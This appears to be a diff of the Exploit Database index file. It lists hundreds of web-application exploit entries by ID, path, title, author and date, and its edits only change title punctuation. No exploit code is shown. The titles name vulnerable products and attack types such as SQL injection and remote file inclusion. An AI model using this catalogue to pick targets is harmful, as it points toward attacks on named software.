 10971,platforms/php/webapps/10971.txt,"Joomla! Component Bamboo Simpla Admin Template - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0
 10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0
 10974,platforms/php/webapps/10974.txt,"Simple Portal 2.0 - Authentication Bypass",2010-01-03,Red-D3v1L,php,webapps,0
-10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop - (productdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0
+10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop - 'productdetail' SQL Injection",2010-01-03,Err0R,php,webapps,0
 10977,platforms/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,php,webapps,0
 10978,platforms/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection",2010-01-03,Sora,php,webapps,0
 10979,platforms/php/webapps/10979.txt,"Joomla! Component com_oziogallery2 / IMAGIN - Arbitrary File Write",2010-01-03,"Ubik and er",php,webapps,0
@@ -22947,7 +22951,7 @@ id,file,description,date,author,platform,type,port
 11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,php,webapps,0
 11110,platforms/php/webapps/11110.txt,"Image Hosting Script - Arbitrary File Upload",2010-01-11,R3d-D3V!L,php,webapps,0
 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps,0
-11113,platforms/php/webapps/11113.txt,"tincan ltd - (section) SQL Injection",2010-01-11,ALTBTA,php,webapps,0
+11113,platforms/php/webapps/11113.txt,"tincan ltd - 'section' SQL Injection",2010-01-11,ALTBTA,php,webapps,0
 11116,platforms/php/webapps/11116.html,"Alwjeez Script - Database Backup",2010-01-11,alnjm33,php,webapps,0
 11120,platforms/php/webapps/11120.txt,"Layout CMS 1.0 - SQL Injection / Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0
 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,php,webapps,0
@@ -23679,7 +23683,7 @@ id,file,description,date,author,platform,type,port
 12355,platforms/php/webapps/12355.pl,"Excitemedia CMS - SQL Injection",2010-04-23,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 12358,platforms/php/webapps/12358.txt,"Memorial Web Site Script - Reset Password / Insecure Cookie Handling",2010-04-23,"Chip d3 bi0s",php,webapps,0
 12359,platforms/php/webapps/12359.txt,"Memorial Web Site Script - Multiple Arbitrary Delete",2010-04-23,"Chip d3 bi0s",php,webapps,0
-12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - (tempid) SQL Injection",2010-04-23,v3n0m,php,webapps,0
+12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - 'tempid' SQL Injection",2010-04-23,v3n0m,php,webapps,0
 12361,platforms/php/webapps/12361.txt,"lanewsfactory - Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps,0
 12364,platforms/php/webapps/12364.txt,"Openpresse 1.01 - Local File Inclusion",2010-04-24,cr4wl3r,php,webapps,0
 12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-24,cr4wl3r,php,webapps,0
@@ -23872,7 +23876,7 @@ id,file,description,date,author,platform,type,port
 12644,platforms/php/webapps/12644.txt,"WebJaxe - SQL Injection",2010-05-18,IHTeam,php,webapps,0
 12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0
 12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0
-12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0
+12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - 'vid' SQL Injection",2010-05-18,ByEge,php,webapps,0
 12648,platforms/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
 12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - (sukaCMS) Local File Disclosure",2010-05-18,vir0e5,php,webapps,0
 12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0
@@ -23943,7 +23947,7 @@ id,file,description,date,author,platform,type,port
 12735,platforms/php/webapps/12735.txt,"Nitro Web Gallery - SQL Injection",2010-05-25,cyberlog,php,webapps,0
 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
 12737,platforms/php/webapps/12737.txt,"Simpel Side - 'index2.php' SQL Injection",2010-05-25,MN9,php,webapps,0
-12743,platforms/php/webapps/12743.txt,"web5000 - (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0
+12743,platforms/php/webapps/12743.txt,"web5000 - 'page_show' SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0
 12744,platforms/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,php,webapps,0
 12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0
 12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall - 'pages.php' SQL Injection",2010-05-26,Newbie_Campuz,php,webapps,0
@@ -23976,7 +23980,7 @@ id,file,description,date,author,platform,type,port
 12791,platforms/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
 12792,platforms/php/webapps/12792.txt,"MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-29,XroGuE,php,webapps,0
 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps,0
-12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - (id= / page=) SQL Injection",2010-05-29,gendenk,php,webapps,0
+12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - 'id=' / 'page=' SQL Injection",2010-05-29,gendenk,php,webapps,0
 12796,platforms/php/webapps/12796.txt,"Joomla! Component BF Quiz 1.0 - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
 12797,platforms/php/webapps/12797.txt,"Webiz 2004 - Local File Upload",2010-05-29,kannibal615,php,webapps,0
 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0
@@ -24153,7 +24157,7 @@ id,file,description,date,author,platform,type,port
 13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)",2010-06-19,"Luis Santana",php,webapps,0
 14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard - SQL Injection",2010-08-31,Ariko-Security,php,webapps,0
 13944,platforms/php/webapps/13944.txt,"SimpleAssets - Authentication Bypass / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0
-13945,platforms/php/webapps/13945.txt,"iBoutique - (page) SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0
+13945,platforms/php/webapps/13945.txt,"iBoutique - 'page' SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0
 13946,platforms/php/webapps/13946.txt,"Overstock Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
 13947,platforms/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
 13948,platforms/php/webapps/13948.txt,"OroHYIP - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
@@ -24425,7 +24429,7 @@ id,file,description,date,author,platform,type,port
 14425,platforms/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",php,webapps,0
 14426,platforms/php/webapps/14426.pl,"Imagine-cms 2.50 - SQL Injection",2010-07-21,Metropolis,php,webapps,0
 14427,platforms/windows/webapps/14427.txt,"Outlook Web Access 2003 - Cross-Site Request Forgery",2010-07-21,anonymous,windows,webapps,0
-14432,platforms/php/webapps/14432.txt,"OpenX - (phpAdsNew) Remote File Inclusion",2010-07-21,"ViRuS Qalaa",php,webapps,0
+14432,platforms/php/webapps/14432.txt,"OpenX - 'phpAdsNew' Remote File Inclusion",2010-07-21,"ViRuS Qalaa",php,webapps,0
 14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts - Arbitrary File Upload",2010-07-21,H-SK33PY,php,webapps,0
 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0
 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0
@@ -24616,7 +24620,7 @@ id,file,description,date,author,platform,type,port
 14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0
 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0
 14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps,0
-14985,platforms/php/webapps/14985.txt,"System Shop - (Module aktka) SQL Injection",2010-09-12,secret,php,webapps,0
+14985,platforms/php/webapps/14985.txt,"System Shop - 'Module aktka' SQL Injection",2010-09-12,secret,php,webapps,0
 14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection",2010-09-12,CoBRa_21,php,webapps,0
 14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps,0
 14989,platforms/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,php,webapps,0
@@ -25228,7 +25232,7 @@ id,file,description,date,author,platform,type,port
 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0
 16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution (Metasploit)",2010-07-14,Metasploit,cgi,webapps,0
 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0
-16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - Remote PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,webapps,0
+16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)",2010-09-20,Metasploit,php,webapps,0
 16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,php,webapps,0
 16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection (Metasploit)",2010-07-03,Metasploit,php,webapps,0
 16914,platforms/cgi/webapps/16914.rb,"The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0
@@ -25499,7 +25503,7 @@ id,file,description,date,author,platform,type,port
 17553,platforms/php/webapps/17553.txt,"Joomla! Component 'com_rsappt_pro2' - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0
 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0
 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0
-17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
+17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - 'messagegroupid' SQL Injection",2011-07-21,fb1h2s,php,webapps,0
 17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
 17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
 17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
@@ -25785,7 +25789,7 @@ id,file,description,date,author,platform,type,port
 18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0
 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0
 18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - (Downloads) Blind SQL Injection",2011-11-23,Dante90,php,webapps,0
-18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (1)",2011-11-23,EgiX,php,webapps,0
+18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)",2011-11-23,EgiX,php,webapps,0
 18151,platforms/php/webapps/18151.php,"Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0
 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps,0
 18155,platforms/php/webapps/18155.txt,"Zabbix 1.8.4 - 'popup.php' SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0
@@ -26729,7 +26733,7 @@ id,file,description,date,author,platform,type,port
 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0
 22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD - save_item.php Arbitrary File Upload",2003-01-20,frog,php,webapps,0
 22279,platforms/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Inclusion",2003-02-24,"Karol Wiesek",php,webapps,0
-22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 - Packages.php Remote File Inclusion",2003-01-22,spabam,php,webapps,0
+22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion",2003-01-22,spabam,php,webapps,0
 22195,platforms/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x - Remote File Inclusion Command Execution",2003-01-22,MGhz,php,webapps,0
 22198,platforms/cgi/webapps/22198.txt,"GNU Mailman 2.1 - 'email' Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0
 22199,platforms/cgi/webapps/22199.txt,"GNU Mailman 2.1 - Error Page Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0
@@ -26764,15 +26768,15 @@ id,file,description,date,author,platform,type,port 22284,platforms/php/webapps/22284.txt,"CuteNews 0.88 - 'search.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 - 'comments.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22293,platforms/php/webapps/22293.txt,"E-theni - Remote File Inclusion Command Execution",2003-01-06,frog,php,webapps,0 -22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 - ipchat.php Remote File Inclusion",2003-02-27,frog,php,webapps,0 +22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 - 'ipchat.php' Remote File Inclusion",2003-02-27,frog,php,webapps,0 22297,platforms/php/webapps/22297.pl,"Typo3 3.5 b5 - 'showpic.php' File Enumeration",2003-02-28,"Martin Eiszner",php,webapps,0 -22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 - Translations.php Remote File Inclusion",2003-02-28,"Martin Eiszner",php,webapps,0 +22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion",2003-02-28,"Martin Eiszner",php,webapps,0 22300,platforms/php/webapps/22300.txt,"WordPress Plugin Easy Webinar - Blind SQL Injection",2012-10-28,"Robert Cooper",php,webapps,0 22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0 22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0 22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0 40413,platforms/php/webapps/40413.txt,"Joomla! Component 'com_videogallerylite' 1.0.9 - SQL Injection",2016-09-22,"Larry W. 
Cashdollar",php,webapps,80 -22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0 +22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - 'Defines.php' Remote File Inclusion",2003-03-03,frog,php,webapps,0 22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution",2003-03-06,"gregory Le Bras",php,webapps,0 22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 - Logbook.pl Remote Command Execution",2003-03-07,"Aleksey Sintsov",cgi,webapps,0 22339,platforms/php/webapps/22339.txt,"SimpleBBS 1.0.6 - users.php Insecure File Permissions",2003-03-07,flur,php,webapps,0 @@ -26877,7 +26881,7 @@ id,file,description,date,author,platform,type,port 22590,platforms/php/webapps/22590.txt,"NetOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,php,webapps,0 22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps,0 22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 - modules.php 'Username' URI Parameter Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",php,webapps,0 -22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 +22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - (Multiple Downloads Module) SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure",2003-05-13,"Rynho Zeros Web",php,webapps,0 22599,platforms/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",php,webapps,0 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,php,webapps,0 
@@ -26885,7 +26889,7 @@ id,file,description,date,author,platform,type,port
 22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection",2003-05-15,frog,php,webapps,0
 22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access",2003-05-15,frog,php,webapps,0
 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0
-22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - header.php Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0
+22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0
 22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL Injection",2003-05-20,ScriptSlave@gmx.net,php,webapps,0
 22625,platforms/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,php,webapps,0
 22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 - member.php Cross-Site Scripting",2003-06-22,"Marc Ruef",php,webapps,0
@@ -26943,7 +26947,7 @@ id,file,description,date,author,platform,type,port
 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0
 22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php' 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0
 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0
-22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - Lib.Inc.php Remote File Inclusion Command Execution",2003-06-15,frog,php,webapps,0
+22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - 'Lib.Inc.php' Remote File Inclusion / Command Execution",2003-06-15,frog,php,webapps,0
 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0
 22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - search.asp Cross-Site Scripting",2003-06-16,JeiAr,asp,webapps,0
 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0
@@ -27037,7 +27041,7 @@ id,file,description,date,author,platform,type,port
 23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps,0
 23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0
 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0
-23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - HTMLtags.php Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0
+23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0
 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' Parameter SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0
 23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php' 'menuitem' Parameter SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0
 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0
@@ -27056,7 +27060,7 @@ id,file,description,date,author,platform,type,port
 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0
 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0
 23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal",2003-09-01,"Zero X",cgi,webapps,0
-23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x - Multiple Module SQL Injection",2003-09-03,noconflic,php,webapps,0
+23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x - (Multiple Modules) SQL Injection",2003-09-03,noconflic,php,webapps,0
 23103,platforms/php/webapps/23103.txt,"Digital Scribe 1.x - Error Function Cross-Site Scripting",2003-09-05,Secunia,php,webapps,0
 23105,platforms/php/webapps/23105.txt,"MyBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps,0
 23106,platforms/php/webapps/23106.txt,"SchoolCMS - Persistent Cross-Site Scripting",2012-12-03,VipVince,php,webapps,0
@@ -27183,7 +27187,7 @@ id,file,description,date,author,platform,type,port
 23466,platforms/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - store Parameter Full Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0
 23467,platforms/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - template Parameter Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0
 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,cgi,webapps,0
-23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - Multiple Module SQL Injection",2004-02-02,"Security Corporation",php,webapps,0
+23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - (Multiple Modules) SQL Injection",2004-02-02,"Security Corporation",php,webapps,0
 23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 - email.php Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0
 23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 - Viewshoutbox.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0
 23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - privmsg.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0
@@ -27201,7 +27205,7 @@ id,file,description,date,author,platform,type,port
 23498,platforms/hardware/webapps/23498.txt,"SonicWALL SonicOS 5.8.1.8 WAF - Cross-Site Scripting",2012-12-19,Vulnerability-Lab,hardware,webapps,0
 23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0
 23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x - Unauthorized Admin Access",2004-01-30,"Himeur Nourredine",php,webapps,0
-23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - 'config_page.php' Remote PHP File Inclusion",2004-01-02,tsbeginnervn,php,webapps,0
+23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion",2004-01-02,tsbeginnervn,php,webapps,0
 23513,platforms/php/webapps/23513.txt,"Athena Web Registration - Remote Command Execution",2004-01-02,"Peter Kieser",php,webapps,0
 23515,platforms/asp/webapps/23515.txt,"ASPApp PortalApp - Remote User Database Access",2004-01-04,newbie6290,asp,webapps,0
 23516,platforms/asp/webapps/23516.txt,"ASP-Nuke 1.0/1.2/1.3 - Remote User Database Access",2004-01-04,"Vietnamese Security Group",asp,webapps,0
@@ -27214,14 +27218,14 @@ id,file,description,date,author,platform,type,port
 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure",2004-01-06,Windak,php,webapps,0
 23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - edit.cgi Directory Traversal",2004-01-10,FIST,cgi,webapps,0
 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps,0
-23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - module.php Remote Command Execution",2004-01-10,"Zero X",php,webapps,0
+23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution",2004-01-10,"Zero X",php,webapps,0
 23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting",2004-01-16,JeiAr,php,webapps,0
 23547,platforms/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 - Adminlogin.asp SQL Injection",2004-01-16,posidron,asp,webapps,0
 23548,platforms/cgi/webapps/23548.txt,"MetaDot Portal Server 5.6.x - index.pl Multiple Parameter SQL Injection",2004-01-16,JeiAr,cgi,webapps,0
 23549,platforms/cgi/webapps/23549.txt,"MetaDot Portal Server 5.6.x - index.pl Information Disclosure",2004-01-16,JeiAr,cgi,webapps,0
 23550,platforms/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x - index.pl Multiple Parameter Cross-Site Scripting",2004-01-16,JeiAr,cgi,webapps,0
 23551,platforms/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x - userchannel.pl op Parameter Cross-Site Scripting",2004-01-16,JeiAr,cgi,webapps,0
-23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 - mod_mainmenu.php Remote File Inclusion",2004-01-19,Yo_Soy,php,webapps,0
+23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion",2004-01-19,Yo_Soy,php,webapps,0
 23554,platforms/php/webapps/23554.java,"YABB SE 1.x - SSI.php ID_MEMBER SQL Injection",2004-01-19,BaCkSpAcE,php,webapps,0
 23558,platforms/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",php,webapps,0
 23561,platforms/asp/webapps/23561.txt,"DUware Software - Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0
@@ -27235,11 +27239,11 @@ id,file,description,date,author,platform,type,port
 23613,platforms/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 - File Disclosure",2004-01-20,"Zone-h Security Team",cgi,webapps,0
